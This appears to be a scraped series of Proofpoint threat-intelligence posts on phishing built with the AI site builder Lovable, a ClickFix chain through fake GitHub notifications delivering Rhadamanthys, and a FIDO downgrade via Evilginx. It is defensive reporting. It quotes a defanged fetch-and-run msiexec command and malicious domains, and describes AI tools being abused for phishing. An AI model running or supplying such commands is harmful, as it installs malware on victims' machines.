Something #spicy is coming to the next Only Malware in the Building #podcast—dropping September 2nd. 🌶️. Bookmark the show page and reserve your seat 🪑 at the table alongside Selena Larson, Dave Bittner, and Keith Mularski. 🔥 You won't want to miss it!

RT @proofpoint: GenAI-powered tools are lowering the barrier of entry for attackers. @ThreatInsight observed threat actors using services….

Introducing Grok Imagine.

With automatic web creation tools, threat actors can spend more time on multi-stage attack chain and more sophisticated tooling capabilities. Developers of such tools should be mindful of opportunities for abuse and implement safeguards to prevent exploitation. #Lovable.

Our blog has further insights on how Lovable is being leveraged by threat actors. This activity demonstrates how AI tools can significantly lower the barrier to entry for cybercriminals, especially those focused on creating social engineering content that appeal to the end user.

We've partnered with Lovable's Trust & Safety team to identify and take down hundreds of malicious domains. The company says it's introducing security protections to proactively identify/block fraud activity and malicious users. We thank them for their quick response & action.

When we replicated the malicious activity, we encountered no guardrails or errors in trying to create our fake phishing website. The website we generated was equipped with capabilities that impersonated prominent enterprise software to steal credentials.

We have flagged tens of thousands of Lovable URLs as threats each month in email and SMS data since Feb 2025. Threat actors create or clone websites that impersonate prominent brands, use CAPTCHA for filtering, and then post credentials to Telegram. Other cybersecurity vendors,

You asked, we answered. AI tools are significantly lowering the barrier to entry for cybercriminals. We have observed threat actor campaigns leveraging the AI-generated website builder Lovable to create and host cred phishing, malware, and fraud websites.

Example system commands:. C:\Users\<username>\AppData\Local\Programs\MediaHuman Lyrics Finder Free\LdVBoxSVC.exe LdVBoxSVC.exe. Bitly redirect: hxxps://gitsecguards[.]com. ClickFix Landing domain: security[.]flaxergaurds[.]com. Organizations are encouraged to restrict PowerShell.

Example ClickFix command: msiexec /i hxxps:///temopix[.]com /qn. Example of MSI: shields.msi | File Size: 10981376 Byte(s) (10,47 MB) | SHA256: 4c9df28e6b802ebe9e40f8fe34d2014b1fe524c64f7c8bd013f163c4daa794b2.

CoreSecThree is likely operated by a single threat actor. Proofpoint assesses with medium confidence that both the campaigns via compromised websites and this GitHub campaign are performed by the same threat actor.

Notably, this chain uses CoreSecThree infrastructure, previously only observed to be used on compromised websites as an inject. CoreSecThree is a delivery framework leveraged for filtering and enabling ClickFix campaigns to distribute malware, typically information stealers.

Following the instructions will initiate a command that downloads and executes malware. The specific malware may vary throughout the campaign. At the time of analysis, the ClickFix Payload URL has led to the Rhadamanthys malware.

The notifications contain shortened URLs that will lead to an actor-controlled website. The website will perform filtering functions, and if those checks are passed, the visitor will be redirected to a website that presents a fake GitHub-branded CAPTCHA instructing users to

We identified GitHub notification emails that kick off the attack chain. The emails are likely generated by the threat actor creating an issue in an actor-controlled repository with a fake security warning, and then tagging legitimate accounts who receive notifications that they

Proofpoint @threatinsight identified a unique attack chain leveraging GitHub notifications to deliver #Rhadamanthys. We first spotted this post by @anyrun_app about ClickFix delivering Rhadamanthys and began investigating. 🔍.

As more companies adopt “phishing-resistant” authentication methods like FIDO, attackers could evolve their existing tactics, techniques, and procedures (TTPs) by incorporating FIDO authentication downgrade into kill chains. Read our blog for more info on this potential threat.

We were successfully able to craft a dedicated phishlet for the Evilginx AiTM attack framework and execute a FIDO downgrade. If we were a threat actor, we could have intercepted login credentials or launched post-compromise actions such as data exfiltration and lateral movement.

The technique involves using a dedicated phishlet to downgrade FIDO-based authentication to less secure methods. Our blog shows how such FIDO downgrades can be executed against Microsoft Entra ID users in a way that is not limited to any specific implementation.

While the tactic has not yet been observed in the wild, the finding poses a significant emerging threat and questions the reliability of FIDO-passkey implementations, a highly recommended authentication method used to verify user identities and improving online security.